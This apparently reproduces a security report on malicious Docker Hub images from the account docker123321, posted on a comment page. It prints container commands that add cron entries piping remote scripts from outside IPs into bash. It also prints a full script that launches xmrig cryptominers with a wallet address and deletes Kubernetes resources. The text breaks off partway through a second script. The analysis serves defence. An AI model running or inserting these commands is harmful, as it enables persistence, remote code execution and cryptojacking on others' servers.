Comment
Author: Admin | 2025-04-27
Vulnerability within days of the patch being released by forcing public facing servers to download and execute a malicious cryptomining payload.Even before December 2017 we documented Docker images hosted on the Docker Hub registry that were seen to embed malicious malware. This was particularly the case for the Docker account docker123321, which was created in May 2017 (see Figure 1), and which currently provides 19 images under popular project names like Cron, Tomcat, and Mysql.Figure 1: docker123321 home page on Docker Hub When we inspect one of these images using the CLI, we see the following: docker inspect docker123321/kk…"Cmd": [ "/bin/sh", "-c", "echo -e "* * * * * root /usr/bin/curl -s hxxp://198.181.41.97:8220/test44.sh | bash -s\\n" >> /mnt/etc/crontab" ],… "Cmd" contains the command line run while starting the container, as can be seen above.It adds a command line to the Cron Linux job scheduler, the purpose of which is to automatically download a test44.sh file from a remote server.Here’s the content of that shell script. #!/bin/bash(docker pause `docker ps|grep kube-apis |awk '{print $1}'`;docker pause `docker ps|grep nginx78 |awk '{print $1}'`;docker run --name sosmseww --restart unless-stopped--read-only -m 50M bitnn/alpine-xmrig -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x -k --donate-level=1;docker run --name sosmsea2 --restart unless-stopped --read-only -m 50M bitnn/alpine-xmrig -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x -k --donate-level=1;docker run --name sosmsen2 --restart unless-stopped --read-only -m 50M bitnn/alpine-xmrig -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x -k --donate-level=1;docker run --name sosmsek2 --restart unless-stopped --read-only -m 50M bitnn/alpine-xmrig -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x -k --donate-level=1;docker run --name sosmset2 --restart unless-stopped --read-only -m 50M bitnn/alpine-xmrig -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x -k --donate-level=1;kubectl delete $(kubectl --server=aaa get all | grep "nginx78-" | awk "{print \$1}")) It appears to run five instances of the crypto mining official image bitnn/alpine-xmrig, under the names “sosmseww”, “sosmsea2”, “sosmsen2”, “sosmsek2“, and “sosmset2“. That image is auto pulled if it does not exist locally. All five of these containers connect to the crypto-pool.fr pool.A more recent case is the image dubbed docker123321/cron, which was pushed onto the public registry the first week of January. docker inspect docker123321/cron "Cmd": [ "/bin/sh", "-c", "#(nop) ", "CMD ["/bin/sh" "-c" "echo \\"* * * * * curl -s hxxp:// 162.212.157.244:8220/logo1.jpg | bash -s\\" >> /mnt/etc/crontab"]" ],That logo1.jpg file is a shell script file that downloads and locally executes a crypto currency miner, as defined below: #!/bin/shps aux | grep -vw suppoie | awk '{if($3>40.0) print $2}' | while read
Add Comment